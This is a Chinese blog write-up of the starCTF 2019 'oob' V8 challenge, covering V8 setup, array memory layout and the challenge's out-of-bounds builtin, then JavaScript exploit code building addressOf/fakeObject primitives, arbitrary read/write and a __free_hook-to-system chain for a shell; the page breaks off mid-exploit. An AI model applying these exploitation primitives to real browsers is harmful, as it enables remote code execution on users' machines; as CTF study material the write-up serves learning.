<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>浏览器漏洞学习--V8--starctf2019(*ctf)-oob | 白里个白</title>
  <meta name="author" content="SofrWhite">
  
  <meta name="description" content="前言准备开始学习浏览器漏洞的相关知识，其实之前就了解过一些关于浏览器的相关知识，这次也是整理加学习，准备把这些内容好好学习一下。
关键字： CTF pwn browser v8 *CTF starCTF oob">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="浏览器漏洞学习--V8--starctf2019(*ctf)-oob"/>
  <meta property="og:site_name" content="白里个白"/>

  
    <meta property="og:image" content=""/>
  

  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  


<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?70c14b3774d11227a872a4e3d91d46e9";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


<meta name="generator" content="Hexo 4.2.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">白里个白</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> 浏览器漏洞学习--V8--starctf2019(*ctf)-oob</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>准备开始学习浏览器漏洞的相关知识，其实之前就了解过一些关于浏览器的相关知识，这次也是整理加学习，准备把这些内容好好学习一下。</p>
<p>关键字： <code>CTF</code> <code>pwn</code> <code>browser</code> <code>v8</code> <code>*CTF</code> <code>starCTF</code> <code>oob</code></p>
<a id="more"></a>

<h2 id="V8的搭建"><a href="#V8的搭建" class="headerlink" title="V8的搭建"></a>V8的搭建</h2><p>v8的搭建主要的考验就是对于某种大家都懂的因素进行抗争，解决了这个问题后，其余都不是大问题。</p>
<p>安装时主要参考了：<a href="https://bbs.pediy.com/thread-258431.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-258431.htm</a></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://chromium.googlesource.com/chromium/tools/depot_tools.git</span><br><span class="line"><span class="built_in">echo</span> <span class="string">'export PATH=$PATH:"/path/to/depot_tools"'</span> &gt;&gt; ~/.bashrc</span><br><span class="line"><span class="comment"># /path/to/depot_tools改成depot_tools的目录</span></span><br><span class="line"></span><br><span class="line">git <span class="built_in">clone</span> https://github.com/ninja-build/ninja.git</span><br><span class="line"><span class="built_in">cd</span> ninja &amp;&amp; ./configure.py --bootstrap &amp;&amp; <span class="built_in">cd</span> ..</span><br><span class="line"><span class="comment"># clone并且configure</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">'export PATH=$PATH:"/path/to/ninja"'</span> &gt;&gt; ~/.bashrc</span><br><span class="line"><span class="comment"># /path/to/ninja改成ninja的目录</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">fetch v8</span><br><span class="line">gclient sync</span><br><span class="line"></span><br><span class="line">tools/dev/v8gen.py x64.debug</span><br><span class="line">ninja -C out.gn/x64.debug d8</span><br></pre></td></tr></table></figure>



<p>我的本地是ubuntu 18.04 server版，在安装时按照官方流程走，只遇到了一个问题：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">subprocess.CalledProcessError: Command <span class="string">'['</span>/usr/bin/python<span class="string">', '</span>-u<span class="string">', '</span>tools/mb/mb.py<span class="string">', '</span>gen<span class="string">', '</span>-f<span class="string">', '</span>infra/mb/mb_config.pyl<span class="string">', '</span>-m<span class="string">', '</span>developer_default<span class="string">', '</span>-b<span class="string">', '</span>x64.debug<span class="string">', '</span>out.gn/x64.debug<span class="string">']'</span> returned non-zero <span class="built_in">exit</span> status 1</span><br></pre></td></tr></table></figure>

<p>这个时候<code>sudo apt install pkg-config</code>就可以解决了。除此之外没有什么需要注意的。</p>
<p>还有一个问题，就是在debug的版本中，貌似会有一些check，我在debug版本下运行oob题目中的d8会出现以下信息：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span></span><br><span class="line"><span class="meta">#</span><span class="bash"> Fatal error <span class="keyword">in</span> ../../src/objects/fixed-array-inl.h, line 32</span></span><br><span class="line"><span class="meta">#</span><span class="bash"> Check failed: !v8::internal::FLAG_enable_slow_asserts || (IsFixedDoubleArray()).</span></span><br><span class="line"><span class="meta">#</span></span><br><span class="line"><span class="meta">#</span></span><br><span class="line"><span class="meta">#</span></span><br><span class="line"><span class="meta">#</span><span class="bash">FailureMessage Object: 0x7ffd40d77f00</span></span><br><span class="line">==== C stack trace ===============================</span><br></pre></td></tr></table></figure>

<p>在release版本下就可以运行了。</p>
<h2 id="V8调试"><a href="#V8调试" class="headerlink" title="V8调试"></a>V8调试</h2><p>运行d8时使用参数<code>--allow-natives-syntax</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">%DebugPrint(obj) 输出对象地址</span><br><span class="line"></span><br><span class="line">%SystemBreak() 触发调试中断主要结合gdb等调试器使用</span><br></pre></td></tr></table></figure>

<h2 id="基础知识学习"><a href="#基础知识学习" class="headerlink" title="基础知识学习"></a>基础知识学习</h2><h3 id="数组"><a href="#数组" class="headerlink" title="数组"></a>数组</h3><h4 id="JSArray和FixedArray"><a href="#JSArray和FixedArray" class="headerlink" title="JSArray和FixedArray"></a>JSArray和FixedArray</h4><p>我在学习v8的时候，首先接触的概念就是数组，v8的数组是<code>JSArray</code>类型的，而数组的元素则是存储在一个Elements的指针里面，v8把这个结构叫做<code>FixedArray</code>。其结构如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*JSArray</span></span><br><span class="line"><span class="comment">+------------+</span></span><br><span class="line"><span class="comment">+    map     +</span></span><br><span class="line"><span class="comment">+ prototype  +</span></span><br><span class="line"><span class="comment">+  elements  + --&gt; FixedArray</span></span><br><span class="line"><span class="comment">+   length   +</span></span><br><span class="line"><span class="comment">+ properties +</span></span><br><span class="line"><span class="comment">+------------+</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<p>在内存中查看，也可以得到类似结果：</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200531223916467.png" alt="image-20200531223916467"></p>
<p>而<code>FixedArray</code>也分为不同的种类，这里介绍两种：fast模式和slow模式</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*fast                                 slow</span></span><br><span class="line"><span class="comment">+---------+                 +----------------------+</span></span><br><span class="line"><span class="comment">+   map   +                 +          map         +</span></span><br><span class="line"><span class="comment">+  length +                 +    NumberofElemnts   +</span></span><br><span class="line"><span class="comment">+  value0 +                 +NumberOfDeletedElemnts+</span></span><br><span class="line"><span class="comment">+  value1 +                 +        Capacity      +</span></span><br><span class="line"><span class="comment">+   ...   +                 +       PrefixStart    +</span></span><br><span class="line"><span class="comment">+---------+                 +           key        +</span></span><br><span class="line"><span class="comment">                            +          value       +</span></span><br><span class="line"><span class="comment">                            +         Details      +</span></span><br><span class="line"><span class="comment">                            +----------------------+</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<p>其中fast模式就是一般的模式，应对的是一般的数组情况。而slow模式则是应对另一种情况，例如<code>var b[0xffff]=1</code>，在这种情况下，用fast模式来存储显然需要大量的连续空间，去存储少量的数据，这时候，就用slow模式存储了。看看内存情况：</p>
<p>下图就是fast模式：</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200531223916467.png" alt="image-20200531223916467"></p>
<p>而加入一个下标为0xffff的数据后就发生变化了：</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200531223854032.png" alt="image-20200531223854032"></p>
<h4 id="数组中元素存放形式"><a href="#数组中元素存放形式" class="headerlink" title="数组中元素存放形式"></a>数组中元素存放形式</h4><p>在v8中的数组元素的存放形式如下：</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200531221425461.png" alt="image-20200531221425461"></p>
<p>在数组元素都是整数的情况下，我们定义<code>var b=[1,2,3];</code>，其内存布局如下</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200531223916467.png" alt="image-20200531223916467"></p>
<p>其elements的内容如下，这个时候已经能看到elements的地址最低位就是1，需要我们手动减去1。</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200531222715386.png" alt="image-20200531222715386"></p>
<p>可以看到整数的存放形式。接下来看下浮点数的存放形式：</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200531223421342.png" alt="image-20200531223421342"></p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200531223538160.png" alt="image-20200531223538160"></p>
<p>这里的数字以IEEE 754浮点数来存放，<a href="http://www.binaryconvert.com/result_double.html?decimal=049046050可以在线转换浮点数和我们平时使用的数字，如上图中的1.2：" target="_blank" rel="noopener">http://www.binaryconvert.com/result_double.html?decimal=049046050可以在线转换浮点数和我们平时使用的数字，如上图中的1.2：</a></p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200602151906871.png" alt="image-20200602151906871"></p>
<p>最后看一下对象如何存储，其中obj是一个对象：</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200602151950479.png" alt="image-20200602151950479"></p>
<p>可以看到对象在数组中就是以结尾+1的指针形式存在。</p>
<p>了解了这些之后，尝试做做这个题目吧。</p>
<h2 id="starCTF2019-oob"><a href="#starCTF2019-oob" class="headerlink" title="starCTF2019-oob"></a>starCTF2019-oob</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">git reset --hard 6dc88c191f5ecc5389dc26efa3ca0907faef3598</span><br><span class="line">git apply ~/browser_pwn/starctf2019-oob/Chrome/oob.diff</span><br></pre></td></tr></table></figure>

<p>之后，按照正常流程编译。</p>
<h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><p>diif的文件中在Array对象中增加了一个oob函数：</p>
<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--- a/src/bootstrapper.cc</span></span><br><span class="line"><span class="comment">+++ b/src/bootstrapper.cc</span></span><br><span class="line">@@ -1668,6 +1668,8 @@ void Genesis::InitializeGlobal(Handle&lt;JSGlobalObject&gt; global_object,</span><br><span class="line">                           Builtins::kArrayPrototypeCopyWithin, 2, false);</span><br><span class="line">     SimpleInstallFunction(isolate_, proto, "fill",</span><br><span class="line">                           Builtins::kArrayPrototypeFill, 1, false);</span><br><span class="line"><span class="addition">+    SimpleInstallFunction(isolate_, proto, "oob",</span></span><br><span class="line"><span class="addition">+                          Builtins::kArrayOob,2,false);  //增加了一个oob成员函数</span></span><br><span class="line">     SimpleInstallFunction(isolate_, proto, "find",</span><br><span class="line">                           Builtins::kArrayPrototypeFind, 1, false);</span><br><span class="line">     SimpleInstallFunction(isolate_, proto, "findIndex",</span><br></pre></td></tr></table></figure>

<p>分析oob这个函数：</p>
<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc</span><br><span class="line">index 8df340e..9b828ab 100644</span><br><span class="line"><span class="comment">--- a/src/builtins/builtins-array.cc</span></span><br><span class="line"><span class="comment">+++ b/src/builtins/builtins-array.cc</span></span><br><span class="line">@@ -361,6 +361,27 @@ V8_WARN_UNUSED_RESULT Object GenericArrayPush(Isolate* isolate,</span><br><span class="line">   return *final_length;</span><br><span class="line"> &#125;</span><br><span class="line"> &#125;  // namespace</span><br><span class="line"><span class="addition">+BUILTIN(ArrayOob)&#123;</span></span><br><span class="line"><span class="addition">+    uint32_t len = args.length(); //获取参数个数</span></span><br><span class="line"><span class="addition">+    if(len &gt; 2) return ReadOnlyRoots(isolate).undefined_value();</span></span><br><span class="line"><span class="addition">+    Handle&lt;JSReceiver&gt; receiver;</span></span><br><span class="line"><span class="addition">+    ASSIGN_RETURN_FAILURE_ON_EXCEPTION(</span></span><br><span class="line"><span class="addition">+            isolate, receiver, Object::ToObject(isolate, args.receiver()));</span></span><br><span class="line"><span class="addition">+    Handle&lt;JSArray&gt; array = Handle&lt;JSArray&gt;::cast(receiver);</span></span><br><span class="line"><span class="addition">+    FixedDoubleArray elements = FixedDoubleArray::cast(array-&gt;elements());</span></span><br><span class="line"><span class="addition">+    uint32_t length = static_cast&lt;uint32_t&gt;(array-&gt;length()-&gt;Number());//获取array的长度</span></span><br><span class="line"><span class="addition">+    if(len == 1)&#123; </span></span><br><span class="line"><span class="addition">+        //read   //a.oob()---》读</span></span><br><span class="line"><span class="addition">+        return *(isolate-&gt;factory()-&gt;NewNumber(elements.get_scalar(length))); //读取第length个元素，即越界读一个元素</span></span><br><span class="line"><span class="addition">+    &#125;else&#123;</span></span><br><span class="line"><span class="addition">+        //write //a.oob(1)---》写</span></span><br><span class="line"><span class="addition">+        Handle&lt;Object&gt; value;</span></span><br><span class="line"><span class="addition">+        ASSIGN_RETURN_FAILURE_ON_EXCEPTION(</span></span><br><span class="line"><span class="addition">+                isolate, value, Object::ToNumber(isolate, args.at&lt;Object&gt;(1)));</span></span><br><span class="line"><span class="addition">+        elements.set(length,value-&gt;Number());//越界写一个元素至第length个元素</span></span><br><span class="line"><span class="addition">+        return ReadOnlyRoots(isolate).undefined_value();</span></span><br><span class="line"><span class="addition">+    &#125;</span></span><br><span class="line"><span class="addition">+&#125;</span></span><br><span class="line"></span><br><span class="line"> BUILTIN(ArrayPush) &#123;</span><br><span class="line">   HandleScope scope(isolate);</span><br></pre></td></tr></table></figure>

<p>首先来验证我们对oob函数的功能，写一个test脚本：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> a=[<span class="number">1</span>, <span class="number">2</span>];</span><br><span class="line">%DebugPrint(a);</span><br><span class="line"><span class="keyword">var</span> num = f2i(a.oob());</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"leak: "</span>+hex(num));                                                                      </span><br><span class="line">%SystemBreak();</span><br><span class="line">a.oob(<span class="number">1</span>);</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"oob write"</span>);                                                                      </span><br><span class="line">%SystemBreak();</span><br></pre></td></tr></table></figure>

<p>我们在上述的test的脚本中测试<code>oob()</code>和<code>oob(1)</code>的功能是否是我们分析的情况。</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200531225817635.png" alt="image-20200531225817635"></p>
<p>可以看到<code>%DebugPrint(a);</code>接下来查看其elements中的内容：</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200602152549629.png" alt="image-20200602152549629"></p>
<p>可以看到<code>oob()</code>函数泄露出的内容就是我们分析的那样。而在<code>oob(1)</code>之后我们查看一下内存情况：</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200531225935444.png" alt="image-20200531225935444"></p>
<p>可以看到之前的指已经被覆盖成1的double浮点值了。</p>
<h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><p>在整数的数组中：</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200602152910170.png" alt="image-20200602152910170"></p>
<p>可以看到JSArray的起始地址距离elements是比较远的。而浮点数和对象数组这两个地址是很近的：</p>
<p><img src="/2020/06/01/v8%E5%BC%80%E5%9D%91/image-20200602153029476.png" alt="image-20200602153029476"></p>
<p>在这两种情况下，其实elements下面就是JSArray，而一个元素的溢出，使得数组的map值是可以被读和写的，而map值控制了这个数组很多信息，比如读取数组中的元素是按对象来读还是浮点数来读。如果我们可以将其混淆，就可以实现任意的对象的地址的读写。</p>
<h4 id="任意对象地址读"><a href="#任意对象地址读" class="headerlink" title="任意对象地址读"></a>任意对象地址读</h4><p>就是用float数组的map去覆盖object数组的map，然后读object数组中的元素，就可以将对象的地址读出来。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">addressOf</span>(<span class="params">object</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    obj_array[<span class="number">0</span>] = object;</span><br><span class="line">    obj_array.oob(float_map);</span><br><span class="line">    <span class="keyword">var</span> object_addr = obj_array[<span class="number">0</span>];</span><br><span class="line">    obj_array.oob(obj_map);</span><br><span class="line">    <span class="keyword">return</span> f2i(object_addr) <span class="number">-1n</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="任意对象构造"><a href="#任意对象构造" class="headerlink" title="任意对象构造"></a>任意对象构造</h4><p>就是用object数组的map去覆盖float数组的map，然后读float数组中的元素，就可以得到对象。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">fakeObject</span>(<span class="params">fake_addr</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    float_array[<span class="number">0</span>] = i2f(fake_addr);</span><br><span class="line">    float_array.oob(obj_map);</span><br><span class="line">    <span class="keyword">var</span> fake_object = float_array[<span class="number">0</span>];</span><br><span class="line">    float_array.oob(float_map);</span><br><span class="line">    <span class="keyword">return</span> fake_object;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>新手心路:</strong>  当我学这个东西，到这里我是懵逼的，因为我不知道为什么要构造这两个函数。后面整个学完后才了解原因，在下一小节，我结合实例说一下自己的认识。</p>
<h4 id="构造fake-object"><a href="#构造fake-object" class="headerlink" title="构造fake object"></a>构造fake object</h4><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> evil_array= [float_map, <span class="comment">//fake map</span></span><br><span class="line">                 <span class="number">0.0</span>,       <span class="comment">// fake properties</span></span><br><span class="line">                 i2f(<span class="number">0x111n</span>), <span class="comment">// fake elements</span></span><br><span class="line">                 i2f(<span class="number">0x400000000n</span>) <span class="comment">//fake length</span></span><br><span class="line">                ];</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> leak_addr = addressOf(evil_array);</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"[+] leak obj addr: "</span> + hex(leak_addr));</span><br><span class="line"><span class="keyword">var</span> fake_obj_addr = leak_addr+<span class="number">0x30n</span>;</span><br><span class="line"><span class="keyword">var</span> fake_obj = fakeObject(fake_obj_addr+<span class="number">1n</span>);</span><br></pre></td></tr></table></figure>

<p>因为实际上，我们后面需要伪造一个fake object，而fake object中的属性也是以数组的形式存储的，即evil_array，那么我们需要能够操作fake object才能实现任意地址的读写：</p>
<p>fake object如何操作。我们构造的fake object是通过evil_array，而修改evil_array也只能修改我们构造的fake object中间的属性，想要操作fake object的element是不可能的。</p>
<p>而解决这个问题就需要我们第二个函数，任意对象的构造，如果此时evil_array的elements中value的地址传给了这个函数即我们构造的假对象内容，那么函数就会将其作为对象返回给我们，我们就可以操控fake object中的element内容了，这个时候我们只需要操作evil_array[2]，即fake element，就可以改变element的地址，从同fake object而实现任意地址读写。</p>
<p>而要达到这个目的，就需要fake object的地址，这就需要了第一个函数：任意对象地址读，先得到evil_array的地址，之后将其和fake object的相对偏移相运算，就得到了fake object的地址。</p>
<h4 id="任意地址读写"><a href="#任意地址读写" class="headerlink" title="任意地址读写"></a>任意地址读写</h4><p>接下来的任意地址读写也是非常简单了，修改evil_array[2]，到任意地址，然后就修改或查看fake_object[0]，即可实现目的：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">read64</span>(<span class="params">addr</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        evil_array[<span class="number">2</span>] = i2f(addr<span class="number">-0x10n</span>+<span class="number">1n</span>);</span><br><span class="line">        <span class="keyword">var</span> leak_data = f2i(fake_obj[<span class="number">0</span>]);</span><br><span class="line">        <span class="keyword">return</span> leak_data;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">write64</span>(<span class="params">addr,data</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        evil_array[<span class="number">2</span>] = i2f(addr<span class="number">-0x10n</span>+<span class="number">1n</span>);</span><br><span class="line">        fake_obj[<span class="number">0</span>] = i2f(data);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但是这个题目其实这样的写操作是不行的，因为这个函数在写0x7f的时候貌似会出现问题，于是利用这个函数，操作DataView，进而实现任意地址的读写，这个具体的机制，目前我还在学习（捂脸苦笑）。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> data_buf = <span class="keyword">new</span> <span class="built_in">ArrayBuffer</span>(<span class="number">8</span>);</span><br><span class="line"><span class="keyword">var</span> data_view = <span class="keyword">new</span> <span class="built_in">DataView</span>(data_buf);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">dataview_write</span>(<span class="params">addr,data</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        write64(addressOf(data_buf)+<span class="number">0x20n</span>,addr);</span><br><span class="line">        data_view.setFloat64(<span class="number">0</span>,i2f(data),<span class="literal">true</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>后面的其实就是找到一个text的地址，之后查got表得到libc地址，最后改__free_hook为system，最后getshell。其实后面有很多东西我也不是很清楚，但是目前我就一知半解的先将其当作公式方法之类的。比如如何寻找text地址和如果触发free。就像刚开始学pwn，咱也不知道为啥改got表，就改就完了，后面慢慢了解。加油（菜鸡的自我安慰）。</p>
<p>后面的操作：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> a = [<span class="number">1.1</span>, <span class="number">2.2</span>];</span><br><span class="line"><span class="keyword">var</span> a_constructor_addr = addressOf(a.constructor);</span><br><span class="line"></span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"[+] leak addr: "</span> + hex(a_constructor_addr));</span><br><span class="line"><span class="keyword">var</span> text_addr = (read64(read64(a_constructor_addr + <span class="number">0x30n</span>)<span class="number">-1n</span> +<span class="number">0x40n</span>) &gt;&gt; <span class="number">16n</span> )- <span class="number">0xad54e0n</span>;</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"[+] text addr: "</span> + hex(text_addr));</span><br><span class="line"><span class="keyword">var</span> sprintf_got = text_addr+<span class="number">0xd9aa28n</span>;</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"[+] sprintf got addr: "</span> + hex(sprintf_got));</span><br><span class="line"><span class="keyword">var</span> libc_addr = read64(sprintf_got) - <span class="number">0x65000n</span>;</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"[+] libc addr: "</span> + hex(libc_addr));</span><br><span class="line"><span class="keyword">var</span> system_addr = libc_addr + <span class="number">0x4f440n</span>;</span><br><span class="line"><span class="keyword">var</span> free_hook_addr = libc_addr + <span class="number">0x3ed8e8n</span>;</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"[+] system addr: "</span> + hex(system_addr));</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"[+] free hook addr: "</span> + hex(free_hook_addr));</span><br><span class="line"></span><br><span class="line">dataview_write(free_hook_addr,system_addr);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> get_shell_buffer = <span class="keyword">new</span> <span class="built_in">ArrayBuffer</span>(<span class="number">0x1000</span>);</span><br><span class="line"><span class="keyword">let</span> get_shell_dataview = <span class="keyword">new</span> <span class="built_in">DataView</span>(get_shell_buffer);</span><br><span class="line">get_shell_dataview.setFloat64(<span class="number">0</span>, i2f(<span class="number">0x0068732f6e69622fn</span>), <span class="literal">true</span>); <span 